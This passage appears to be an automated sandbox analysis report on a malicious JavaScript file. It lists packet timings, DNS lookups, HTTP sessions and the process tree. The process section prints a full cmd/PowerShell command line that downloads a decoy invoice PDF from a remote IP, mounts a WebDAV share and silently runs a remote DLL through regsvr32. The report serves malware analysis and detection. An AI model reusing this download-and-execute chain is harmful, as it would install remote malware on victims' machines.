                        Jan 15, 2025 08:13:09.587948084 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.587955952 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.587966919 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.587973118 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.587985039 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.587989092 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.587995052 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588004112 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588017941 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588032961 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588042974 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588052988 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588053942 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588063955 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588072062 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588074923 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588083029 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588093996 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588098049 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588135004 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588402033 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588413954 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588423014 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588428020 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588438034 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588442087 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588460922 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588485003 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588684082 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588692904 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588702917 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588712931 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588723898 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588726997 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588736057 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588746071 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588748932 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588757038 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588767052 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588768959 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588792086 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.588973999 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588983059 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.588993073 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589001894 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589014053 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589019060 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589026928 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589030981 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589046001 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589118004 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589128971 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589135885 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589147091 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589157104 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589165926 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589171886 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589174986 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589185953 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589195013 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589196920 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589205980 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589216948 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589220047 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589226961 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589227915 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589250088 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589673042 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589683056 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589693069 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589703083 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589705944 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589715004 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589725971 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589729071 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589736938 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.589751005 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.589771986 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.652983904 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.652995110 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653006077 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653074980 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653094053 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653098106 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.653107882 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653136969 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.653143883 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.653170109 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653352022 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653359890 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653369904 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653387070 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.653412104 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653412104 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.653425932 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653438091 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653470993 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.653517962 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653528929 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.653558969 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660393953 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660403967 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660413980 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660437107 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660450935 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660479069 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660489082 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660496950 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660537004 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660568953 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660578966 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660587072 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660607100 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660633087 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660671949 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660681009 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660690069 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660727024 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660762072 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660770893 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660779953 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660787106 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.660801888 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.660813093 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.679712057 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689356089 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689378023 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689387083 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689399004 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689410925 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689456940 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689467907 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689542055 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689553022 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689562082 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689665079 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689670086 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689676046 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689687014 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689701080 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689706087 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689714909 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689724922 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689733982 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689755917 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689802885 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689811945 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689825058 CET8049704193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:09.689846039 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.689857960 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.745219946 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:09.862174034 CET4970480192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.428462982 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.433420897 CET888849705193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:10.433515072 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.433887959 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:10.438781977 CET888849705193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:11.238305092 CET888849705193.143.1.205192.168.2.5
                        Jan 15, 2025 08:13:11.279119015 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:11.426358938 CET497058888192.168.2.5193.143.1.205
                        Jan 15, 2025 08:13:23.899570942 CET5637053192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:23.904498100 CET53563701.1.1.1192.168.2.5
                        Jan 15, 2025 08:13:23.904575109 CET5637053192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:23.909420967 CET53563701.1.1.1192.168.2.5
                        Jan 15, 2025 08:13:24.358515024 CET5637053192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:24.363500118 CET53563701.1.1.1192.168.2.5
                        Jan 15, 2025 08:13:24.363574982 CET5637053192.168.2.51.1.1.1
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 15, 2025 08:13:23.290910006 CET5536353192.168.2.51.1.1.1
                        Jan 15, 2025 08:13:23.899038076 CET53626151.1.1.1192.168.2.5
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 15, 2025 08:13:23.290910006 CET192.168.2.51.1.1.10x9fc1Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 15, 2025 08:13:21.177265882 CET1.1.1.1192.168.2.50x33ccNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Jan 15, 2025 08:13:21.177265882 CET1.1.1.1192.168.2.50x33ccNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                        Jan 15, 2025 08:13:23.298129082 CET1.1.1.1192.168.2.50x9fc1No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                        • 193.143.1.205
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704193.143.1.205801868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Jan 15, 2025 08:13:08.057343960 CET169OUTGET /invoice.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: 193.143.1.205
                        Connection: Keep-Alive
                        Jan 15, 2025 08:13:08.891019106 CET1236INHTTP/1.1 200 OK
                        Server: nginx/1.22.1
                        Date: Wed, 15 Jan 2025 07:13:08 GMT
                        Content-Type: application/pdf
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Frame-Options: SAMEORIGIN
                        Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 [TRUNCATED]
                        Data Ascii: 1f6a%PDF-1.7%1 0 obj<< /Pages 3 0 R /Type /Catalog >>endobj2 0 obj<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>streamx3V0Qw/+Q0TL)VV0Q0PRU,HUHLO-V%0mendstreamendobj4 0 obj<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>endobj5 0 obj<< /Filter /FlateDecode /Length 75 >>streamx3T0B]C aabgiUeE\ E&@yC:lBWB!P9D~K>W &endstreamendobj6 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>endobj7 0 obj<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>streamx+T(O/6PH/*244S0B]HOS04TpBendstreamendobj8 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>endobj9 0 obj<< /BitsPerComponen [TRUNCATED]
                        Jan 15, 2025 08:13:08.891033888 CET224INData Raw: 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 48 65 69 67 68 74 20 33 35 30 34 20 2f 49 6e 74 65 72 70 6f 6c 61 74 65 20 74 72 75 65 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 57 69 64 74 68
                        Data Ascii: /FlateDecode /Height 3504 /Interpolate true /Subtype /Image /Type /XObject /Width 2479 /Length 634286 >>streamxs-oYfQf|H *Q$oeVUC;"/
                        Jan 15, 2025 08:13:08.891043901 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii:
                        Jan 15, 2025 08:13:08.891056061 CET1236INData Raw: 3b 85 a9 6f 3f 00 00 00 00 00 00 00 00 00 1b 34 75 8a c1 d4 ca 25 f4 d1 96 d0 79 06 bd 9d 3d 6e a2 c7 a0 8a ce 93 68 1a 11 a5 87 ee 9e a9 6f 42 00 00 00 00 00 00 00 00 00 1b 31 75 84 c1 d4 6a 4a 68 1a ed 74 19 f4 f1 66 f6 b8 8e 1e 37 8f a9 8a 56
                        Data Ascii: ;o?4u%y=nhoB1ujJhtf7VOY;oE7uGv+j Tg*~*:{oEk6u~%f vA.q<pDtCtC'0`&K]%3h}
                        Jan 15, 2025 08:13:08.891067028 CET448INData Raw: 14 ec a4 70 2c f4 e3 60 47 ae 3e 30 74 b0 23 f7 a4 d9 91 db 8d 85 7e 68 c7 42 df 76 db 71 df bc ba 78 fd f2 e2 f5 8b 8b 57 2f 9a ff 6c 7a e8 cb ae 87 a6 65 b9 fa e4 50 bb 29 f7 e6 69 b0 29 f7 b1 1b 0e 25 86 4e 6a ea 9b 13 00 00 c0 34 f8 62 09 00
                        Data Ascii: p,`G>0t#~hBvqxW/lzeP)i)%Nj4b/FcvQOt`{psBjK_~1DmM[9L/l4`U*;rfAnWB_)^oCeSC;i4b/FcvO
                        Jan 15, 2025 08:13:08.891086102 CET1236INData Raw: 86 de 06 c7 86 12 43 a7 33 f5 cd 09 00 00 60 1a 7c b1 04 00 00 00 00 c0 97 64 a3 31 05 3b a7 70 60 68 1f 43 d3 81 a1 4f b7 26 86 9e 36 31 74 70 60 e8 db cb 2e 86 36 a7 85 b6 63 a1 cf ce 9f f7 8f b6 87 a6 e1 d0 cb 37 2f fd b1 a1 77 dd b1 a1 6d 0c
                        Data Ascii: C3`|d1;p`hCO&61tp`.6c7/wmM1~CrlvM}s_,%hLT]}lbu:0904zpap`}{+76z96tCoN%$)1&C{u`')6^
                        Jan 15, 2025 08:13:08.891096115 CET1236INData Raw: 28 1d 18 fa a9 3f 30 d4 c5 d0 cb 26 86 9e 9f 35 31 f4 24 8c a1 af 87 31 b4 ef a1 a9 84 a6 1d b9 e5 18 7a da c6 d0 8b 14 43 af 9a 18 7a 7b db 1f 1b da c6 d0 47 13 43 19 0e dd 9e a9 6f 4e 00 00 00 d3 e0 8b 25 00 d8 4d 95 f7 e7 55 d2 c9 5a ae 24 17
                        Data Ascii: (?0&51$1zCz{GCoN%MUZ$M>la\yU.cZjW]g`Z^]~5W-qIae6d[&>+LW1:7zb7+Cz^m}Pwl(1t9L/`j5w.\y,Z*
                        Jan 15, 2025 08:13:08.891102076 CET1236INData Raw: 8f 6e 8f 0e 06 31 f4 fd db 4b d9 94 9b 86 43 75 0f 6d 67 42 bb b1 50 15 43 af 25 86 1e 06 31 f4 e1 fa ea f1 e6 e6 b1 1c 43 39 36 74 5b a6 be 39 01 00 00 4c 83 2f 96 00 60 5a e1 5d b7 e6 9b f3 8f 63 72 df a8 af cc 04 7f 8e 0d 84 86 19 d4 d7 cf 1b
                        Data Ascii: n1KCumgBPC%1C96t[9L/`Z]crZia)seh*w6K_CU^|.%2F'Zrr%cAvtN{QF?X<0!t{&1qC
                        Jan 15, 2025 08:13:08.891105890 CET152INData Raw: 53 d0 0a 9f 26 95 9f 29 77 99 43 4e 6b 4a 56 f9 e9 ca 85 e3 f0 a5 ac ff 79 00 79 26 f5 73 58 f3 93 00 26 e4 95 33 68 65 a5 ad 7f f3 9b 57 f3 29 3a 10 36 a7 f2 75 cc 15 c9 ca a8 5d ce a0 a3 ef 1f 79 e7 94 17 08 fb 37 12 3d 14 c0 84 16 8a 23 f8 dc
                        Data Ascii: S&)wCNkJVyy&sX&3heW):6u]y7=#,x`hM=C?1t8<%?04GCzZheSL}s_,{
                        Jan 15, 2025 08:13:08.891689062 CET1236INData Raw: 31 30 30 30 0d 0a ec 68 17 f0 89 4a 7f 5b fe 6a c8 7c af be 7e 70 a9 d0 0b ca 25 d4 64 50 dd 40 53 e5 3c 38 38 d8 ef 7d 88 c8 ff 7a d0 4a 61 34 15 22 9d 44 73 b3 72 a6 8a 9a 7a e2 83 a3 34 20 13 6d 73 95 4a 27 aa b0 f1 85 39 c6 2b c4 29 73 55 85
                        Data Ascii: 1000hJ[j|~p%dP@S<88}zJa4"Dsrz4 msJ'9+)sUjcfVr3<r^D)h>c]Gj~l@gs0o{'_M1w/bxvMoHfK0UZv]LmBARrq5/X{Cz~bhlh
                        Jan 15, 2025 08:13:08.896003962 CET1236INData Raw: 63 0a c0 97 63 f5 62 82 1d b5 e8 81 a1 12 43 af ae d2 81 a1 e5 18 7a ad 63 68 c5 43 76 e4 f6 31 74 7f 1e 43 4f 4f ee e6 31 f4 b2 89 a1 37 37 4f b7 e3 31 94 4d b9 1b 35 f5 cd 09 00 00 60 1a 7c b1 04 00 db e1 6f ad 3e 86 d6 94 d0 d1 93 25 6b ce b8
                        Data Ascii: ccbCzchCv1tCOO177O1M5`|o>%kP/f#))HMgo_#{k+M$OOzzsHa^r,*Y,,WUB5{i_}zqZKd/AX%a;6%4=]\?Vbm^M~


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549705193.143.1.20588883720C:\Windows\System32\net.exe
                        TimestampBytes transferredDirectionData
                        Jan 15, 2025 08:13:10.433887959 CET107OUTOPTIONS / HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: DavClnt
                        translate: f
                        Host: 193.143.1.205:8888
                        Jan 15, 2025 08:13:11.238305092 CET237INHTTP/1.1 500 Internal Server Error
                        Server: nginx/1.22.1
                        Date: Wed, 15 Jan 2025 07:13:11 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 22
                        Connection: keep-alive
                        X-Content-Type-Options: nosniff
                        Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                        Data Ascii: Internal server error


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:02:13:03
                        Start date:15/01/2025
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js"
                        Imagebase:0x7ff765050000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:02:13:04
                        Start date:15/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
                        Imagebase:0x7ff73bce0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:02:13:04
                        Start date:15/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:02:13:04
                        Start date:15/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
                        Imagebase:0x7ff686a00000
                        File size:5'641'176 bytes
                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:6
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c net use \\193.143.1.205@8888\davwwwroot\
                        Imagebase:0x7ff73bce0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Windows\System32\net.exe
                        Wow64 process (32bit):false
                        Commandline:net use \\193.143.1.205@8888\davwwwroot\
                        Imagebase:0x7ff7a4e70000
                        File size:59'904 bytes
                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                        Imagebase:0x7ff6413e0000
                        File size:3'581'912 bytes
